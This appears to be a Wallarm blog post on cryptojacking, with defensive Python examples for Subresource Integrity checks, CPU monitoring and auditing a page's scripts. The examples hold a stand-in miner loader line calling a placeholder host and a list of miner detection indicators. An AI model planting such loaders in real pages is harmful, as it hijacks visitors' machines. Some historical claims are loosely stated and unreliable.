What is a Cryptojacking Attack ❓ Definition and Prevention

Ivan Novikov
8 min read · Jan 19, 2022


Introduction

Cryptojacking is an attack in which threat actors mine cryptocurrency at the expense of the target’s computing resources and network health. If it is not caught and handled at an early stage, the consequences can be severe.

If you are not yet familiar with this threat, this article will walk you through it. We will cover what a cryptojacking attack is, the general methods attackers use, and a few real-world examples that show how serious the matter is.

Cryptojacking definition

Cryptojacking is a type of cyber-attack: cryptomining with ill intent. It works by embedding malicious code on the targeted device and draining its resources to mine cryptocurrency without authorization.

Cryptocurrency mining involves solving hard mathematical puzzles, which is a slow and resource-hungry task. Attackers often lack adequate resources of their own, so they plan a cryptojacking attack, gain access to targets’ devices and networks, and use them to solve the puzzles instead.

Once the puzzles are solved, the attackers are rewarded with cryptocurrency that can be traded, used to buy other cryptocurrencies, or exchanged for traditional money. The rise of cryptocurrency has provoked a surge in cryptojacking.

Depending on the attacker’s intentions, the cryptocurrency obtained through a cryptojacking attack can either be traded or left in a liquidity pool. To understand cryptojacking properly, two terms are essential: cryptocurrency and cryptomining.

  • Cryptocurrency Definition

Invented accidentally in 2009, cryptocurrency is a cryptographically secured digital currency that allows end-to-end tracking of transactions. Blockchain technology, in which many computers pool their programs and processing power, is what makes cryptocurrency trading and creation possible.

The first cryptocurrency ever created was Bitcoin, and it remains one of the most valuable. As of now, more than 2,500 cryptocurrencies exist. Other well-known cryptocurrencies include Zcash, Ethereum, and Monero.

  • Cryptomining Definition

Cryptomining refers to the computing process that makes cryptocurrency exchange possible. It usually consists of adding cryptocurrency transactions to the blockchain ledger and updating that information.

The people who do this job are called cryptominers. They typically have the skills to run powerful servers and high-end hardware.

Future of Cryptojacking

As long as cryptocurrency is in high market demand, cryptojacking will remain popular, because it lets threat actors mine cryptocurrency without owning the required resources. The attacker is spared the cost of hefty hardware and of building a powerful network.

Cryptojacking depends entirely on the growth of the cryptocurrency industry. However, the industry itself suffers from this unwelcome connection. The two most concerning factors in this trend are:

  • Strict law enforcement that makes things tougher for the crypto world
  • Ban of Coinhive

These two factors have dampened cryptojacking a little. Here is how:

Even though cryptocurrency has come a long way, a good number of countries still do not allow its use. Even where it is legal, many restrictions govern its use. This is a major reason behind the limited acceptance of digital currencies among the public.

Coinhive was the largest site for cryptominers. However, it was shut down in 2019 after its code was badly abused and it became a target for hackers. For a while, this limited the accessibility of cryptocurrency.

How Does it Work?

Cryptojacking is carried out in multiple stages and requires skill. The key steps in a successful cryptojacking attack are:

  • The attacker embeds the mining script in a web page or an email.
  • The code is installed automatically as soon as the target clicks on the malicious content.
  • The script runs stealthily in the background, taking control of the targeted device.
  • Resources are consumed according to the attacker’s needs.
  • The attackers start mining using the targeted devices’ resources.
  • As the primary step of cryptomining, the attackers start working through the complicated algorithms.
  • Once the algorithm is solved, the attacker earns the cryptocurrency.

The whole procedure comes down to controlling a certain part of the device. In that respect it resembles a ransomware attack; the key difference is visibility. Ransomware announces itself, whereas cryptojacking stays hidden and works behind the scenes.

This concealed nature makes the attack harder to identify and fix at an early stage.

Cryptojacking Methods

Cryptojacking attacks reach their victims through three main methods: file-based, browser-based, and cloud cryptojacking. Each has a different modus operandi and course of action, described below.

  • File-Based Cryptojacking

This method involves downloading and executing a malicious file. The file carries a script that, once downloaded, spreads its impact throughout the targeted system’s IT ecosystem. Such files, or links to them, are mostly distributed by email.

Targets are lured into downloading or opening the file. As soon as they do, the script becomes active and starts mining. It works stealthily, without letting the target notice its presence.

  • Browser-Based Cryptojacking

This is a more direct and aggressive attack that affects the IT ecosystem of the targeted device straight from the browser.

It begins with writing a malicious script. Once the malicious actor has the code working, it is embedded directly in multiple web pages across separate sites. The script is fully automatic and needs no manual handling.

As soon as the target visits the infected URL, their device automatically downloads the embedded code and unintentionally assists the attackers in cryptojacking.

Third-party ads and outdated (or less secure) plugins are the usual components in which malicious actors hide their scripts. Sometimes these attacks go a step further and embed the malicious code in a JavaScript library, which makes it easier to run a larger supply-chain attack against the target(s).
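One defense against a tampered JavaScript library is Subresource Integrity (SRI): the page pins each third-party script to the hash of the file it was reviewed with, and the browser refuses to run the file if the served bytes differ. The example below is added here for illustration and is not code from the original article or from Wallarm; the library bytes and the `miner.example` host are constructed placeholders. It computes the `integrity` value for a library and verifies a served copy against it.

```python
import base64
import binascii
import hashlib
import hmac

# Constructed sample: a tiny JavaScript library as originally published.
ORIGINAL_LIBRARY = b"export function add(a, b) { return a + b; }\n"

# Constructed sample: the same library after a loader for a miner was appended.
# The host name is a placeholder, not a real indicator.
TAMPERED_LIBRARY = ORIGINAL_LIBRARY + b"import('https://miner.example/loader.js');\n"

SRI_ALGORITHMS = ("sha256", "sha384", "sha512")


def sri_hash(content: bytes, algorithm: str = "sha384") -> str:
    """Return the SRI integrity value ("<alg>-<base64 digest>") for a resource."""
    if algorithm not in SRI_ALGORITHMS:
        raise ValueError(f"unsupported SRI algorithm: {algorithm}")
    digest = hashlib.new(algorithm, content).digest()
    return f"{algorithm}-{base64.b64encode(digest).decode('ascii')}"


def verify_sri(content: bytes, integrity: str) -> bool:
    """Return True only if the served content matches a digest in the integrity string.

    An integrity attribute may carry several space-separated values; here the
    content is accepted if any well-formed value matches (browsers additionally
    consider only the strongest algorithm listed). Malformed values are ignored,
    so a garbled attribute can never accidentally "match".
    """
    for token in integrity.split():
        algorithm, _, expected_b64 = token.partition("-")
        if algorithm not in SRI_ALGORITHMS:
            continue
        try:
            expected = base64.b64decode(expected_b64, validate=True)
        except (binascii.Error, ValueError):
            continue
        actual = hashlib.new(algorithm, content).digest()
        if hmac.compare_digest(actual, expected):
            return True
    return False


def pinned_script_tag(src: str, reviewed_content: bytes) -> str:
    """Render a <script> tag that pins `src` to the hash of the reviewed bytes."""
    return (
        f'<script src="{src}" integrity="{sri_hash(reviewed_content)}" '
        'crossorigin="anonymous"></script>'
    )


if __name__ == "__main__":
    pinned = sri_hash(ORIGINAL_LIBRARY)
    print(pinned_script_tag("https://cdn.example.com/lib.js", ORIGINAL_LIBRARY))
    print("original passes:", verify_sri(ORIGINAL_LIBRARY, pinned))
    print("tampered passes:", verify_sri(TAMPERED_LIBRARY, pinned))
```

The `crossorigin="anonymous"` attribute is required for SRI on cross-origin scripts so the browser can read the response bytes to hash them. SRI only protects resources you pin deliberately; it does nothing for scripts injected through an ad network or an outdated plugin, which is why the detection checks further down still matter.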

  • Cloud Cryptojacking

This method is a favorite of intruders who want access to your essential resources at large scale. Using the cloud cryptojacking technique, they try to gain access to the APIs your organization uses to reach its cloud platform and related services.

Once in, the attackers can consume CPU resources without limit. This leads to unwanted, excess resource consumption and operational cost for the organization. For the attacker, this method makes it possible to mine at a large scale and faster, with far less effort.

Real examples of cryptojacking

Though it has not affected many to date, cryptojacking is a real problem for businesses and has caused enormous damage. Some of the world’s most notorious cryptojacking attacks are as follows:

  1. Microsoft

In 2019, the Microsoft Store found 8 apps involved in cryptomining. The problematic part was that the resources used in the process belonged to the users who had installed and used the apps.

Though the apps were removed, a lot of damage had already been done. It was speculated that, although the apps came through separate developers, a single person or organization had strategically planned and executed the attack.

The infected apps contained malicious JavaScript code and were instructed to mine Monero. Because the job consumed a huge amount of resources, the targeted devices suffered ill effects such as slowed-down performance and reduced

  2. A European Department

In 2018, there was another cryptojacking victim: the central water control system of Europe. Here too, the cryptomining code was instructed to mine Monero.

Threat actors infected the key operating system of the entire water utility network. Technically, it was the very first attack of its kind to target the industrial landscape for cryptojacking.

  3. Los Angeles Times

The Los Angeles Times, one of the leading media houses, was also victimized by cryptojacking. The incident happened in 2018 and targeted the report page. Anyone who accessed this page on a mobile or other data-driven device was infected. Unfortunately, the cryptojacking code went unidentified for a long time and allowed attackers to mine Monero.

  4. YouTube

Some CoinHive miners were spotted running in multiple YouTube ads.

Detecting cryptojacking: a quick test

If you want to figure out how to stop cryptojacking, you must first learn to detect it.

A strategically planned cryptojacking attack is potent enough to remain hidden while draining resources extensively. At times, attackers plant the code so deftly that targets remain unaware of its presence. However, a little diligence and awareness go a long way toward early detection.

The following cryptojacking test methods can be of great help:

  • Poor performance delivery

As noted above, successfully executed malicious cryptomining code consumes the targeted device’s resources. So a significant symptom is a sudden or gradual dip in the device’s productivity: its performance chart slopes downward.

This unwanted consumption burdens the device and slows it down, so expect slow processing, unexpected shutdowns, and failures when opening certain apps or programs. At times, the targeted device may even refuse to start as it should.

  • Excessive heating

The extra resource consumption overloads the OS of the targeted device and makes it overheat.

When this continues for a long period, the device’s average lifespan decreases. However, overheating is not an unambiguous sign of cryptojacking, since it has many possible causes. Hence, one has to dig deeper and look for other behaviors characteristic of cryptojacking.

  • Inspect the CPU usage

The CPU of a targeted device will be strained when it performs heavy tasks like mining, which is why one must check CPU usage regularly. If you see very high CPU usage while visiting a website with no rich media on it, a suspicious code snippet could be running in the background.

On personal computers, open Task Manager (or the equivalent tool) and look for signs of excessive CPU usage. In an enterprise ecosystem, a dedicated IT team should handle this task.
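The point that matters when reading Task Manager or `ps` is persistence: a video encode or a compiler run will peg the CPU for a while and then stop, whereas a miner stays near 100% for as long as it lives. The script below is an added example, not code from the original article or from Wallarm. It parses several snapshots of `ps -eo pid,pcpu,comm` output (the three snapshots and the process names in them are constructed for the example) and flags only the processes that exceed the threshold in every sample, so one-off bursts are not reported.

```python
from collections import defaultdict

# Constructed sample: three snapshots of `ps -eo pid,pcpu,comm` output, taken a
# few seconds apart. The process names are hypothetical. "updater" stays pinned
# near 100% in every sample; "ffmpeg" and "code" only burst once.
SNAPSHOTS = [
    """  PID %CPU COMMAND
  1201  2.5 chrome
  1340 97.8 updater
  1502  1.1 code
  1633 45.0 ffmpeg
""",
    """  PID %CPU COMMAND
  1201  3.0 chrome
  1340 98.4 updater
  1502  0.9 code
  1633  0.3 ffmpeg
""",
    """  PID %CPU COMMAND
  1201  2.1 chrome
  1340 96.9 updater
  1502 55.0 code
  1633  0.0 ffmpeg
""",
]


def parse_ps(snapshot: str) -> dict:
    """Parse `ps -eo pid,pcpu,comm` text into {pid: (cpu_percent, command)}.

    The first line is the header; malformed lines are skipped rather than
    raising, so a truncated snapshot does not abort the whole check.
    """
    procs = {}
    for line in snapshot.splitlines()[1:]:
        parts = line.split(None, 2)
        if len(parts) < 3:
            continue
        pid, cpu, comm = parts
        try:
            procs[int(pid)] = (float(cpu), comm.strip())
        except ValueError:
            continue
    return procs


def sustained_high_cpu(snapshots, threshold: float = 80.0, min_samples: int = 3):
    """Return [(pid, command, average_cpu)] for processes at or above `threshold`
    in every one of at least `min_samples` snapshots.

    Requiring every sample is what separates a miner from a legitimate burst:
    a process that spikes once and drops back is never flagged.
    """
    history = defaultdict(list)
    names = {}
    for snap in snapshots:
        for pid, (cpu, comm) in parse_ps(snap).items():
            history[pid].append(cpu)
            names[pid] = comm
    flagged = []
    for pid, samples in sorted(history.items()):
        if len(samples) >= min_samples and all(c >= threshold for c in samples):
            flagged.append((pid, names[pid], round(sum(samples) / len(samples), 1)))
    return flagged


if __name__ == "__main__":
    for pid, comm, avg in sustained_high_cpu(SNAPSHOTS):
        print(f"sustained high CPU: pid={pid} command={comm} avg={avg}%")
```

On a real host you would collect the snapshots by running `ps -eo pid,pcpu,comm` on a timer (or the equivalent process listing on Windows) and feed the captured text to `sustained_high_cpu`; a process that is flagged while the machine is supposedly idle deserves a closer look at its binary and its network connections.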

  • Keeping an eye on the website

Threat actors stay vigilant and hunt for websites that are vulnerable and offer multiple opportunities to embed code. Make sure your website is not running any outdated plugin or add-on.

Also, if you own a website, inspect it regularly so that any malicious code can be spotted early. The earlier the detection, the smaller the damage.
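A regular inspection of your own pages can be automated: fetch each page and flag every `<script>` whose `src` points at a host you never approved, plus inline scripts that contain miner indicators. The auditor below is an added example, not code from the original article or from Wallarm. The allowed hosts, the sample page, and the `pool.example` address are constructed for the example; "coinhive" is the service the article names, and the other indicator strings stand in for the list a defender would maintain and tune.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts your pages are allowed to load scripts from (constructed for this example).
# This is the same list a Content-Security-Policy `script-src` directive would
# enforce in the browser; auditing it server-side catches injections early.
ALLOWED_SCRIPT_HOSTS = {"www.example.com", "cdn.example.com"}

# Substrings treated as miner indicators in inline scripts. Keep this list short
# and curated; "coinhive" is the service named in the article, "stratum+tcp://"
# is the URI scheme mining pools use, "cryptonight" is a mining algorithm name.
MINER_INDICATORS = ("coinhive", "stratum+tcp://", "cryptonight")

# Constructed sample page: one approved CDN script, one unapproved external
# script, one inline loader (a made-up stand-in, not real miner code), and one
# same-origin script that should not be flagged.
SAMPLE_PAGE = """<html><head>
<script src="https://cdn.example.com/app.js"></script>
<script src="//coinhive.com/lib/miner.js"></script>
<script>
  // constructed stand-in for an injected loader
  startMining({ pool: "stratum+tcp://pool.example:3333", threads: 4 });
</script>
<script src="/static/local.js"></script>
</head><body>Hello</body></html>"""


class ScriptAuditor(HTMLParser):
    """Collect (kind, detail) findings for suspicious <script> elements."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._in_inline_script = False
        self._inline_chunks = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            # urlparse handles absolute and protocol-relative ("//host/...") URLs;
            # a relative path has no hostname and is treated as same-origin.
            host = urlparse(src).hostname or ""
            if host and host not in ALLOWED_SCRIPT_HOSTS:
                self.findings.append(("external-script", src))
            self._in_inline_script = False
        else:
            self._in_inline_script = True
            self._inline_chunks = []

    def handle_data(self, data):
        # HTMLParser delivers <script> bodies through handle_data, possibly in pieces.
        if self._in_inline_script:
            self._inline_chunks.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_inline_script:
            body = "".join(self._inline_chunks).lower()
            for indicator in MINER_INDICATORS:
                if indicator in body:
                    self.findings.append(("inline-indicator", indicator))
            self._in_inline_script = False


def audit_page(html: str):
    """Return the list of findings for one page's HTML."""
    auditor = ScriptAuditor()
    auditor.feed(html)
    auditor.close()
    return auditor.findings


if __name__ == "__main__":
    for kind, detail in audit_page(SAMPLE_PAGE):
        print(f"{kind}: {detail}")
```

Run it against the HTML your server actually sends (not your source templates), because injections through an outdated plugin or a third-party ad appear only in the rendered output. Any `external-script` finding means a host you did not approve is executing code on your visitors' machines and should be investigated before the page stays live.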

Cryptojacking Prevention Tips and Tricks

Cryptojacking is an issue for business because, if not addressed properly, these attacks can cause damage beyond imagination. However, the danger can be kept under control by diligently following these tips:

  • Use cybersecurity tools that can quickly detect malicious code in your system;
  • Web browsers are the first choice of attackers, so protecting them is the first line of defense. There are a few trustworthy add-ons (e.g., No Coin, AntiMiner, and minerBlock) you can rely on for this;
  • Stay aware of current cryptojacking trends to understand what attackers are currently capable of;
  • Blocking ads from untrusted sources reduces the risk of cryptojacking. Spend some time finding a reliable ad blocker;
  • Disable JavaScript when visiting a suspicious site, or disable auto-downloading in your browser;
  • Use the Wallarm API Security Platform, and also read the important post about API security.

Originally published at https://www.wallarm.com.


Written by Ivan Novikov

CEO at Wallarm, an application security platform that prevents threats and discovers vulnerabilities in real time.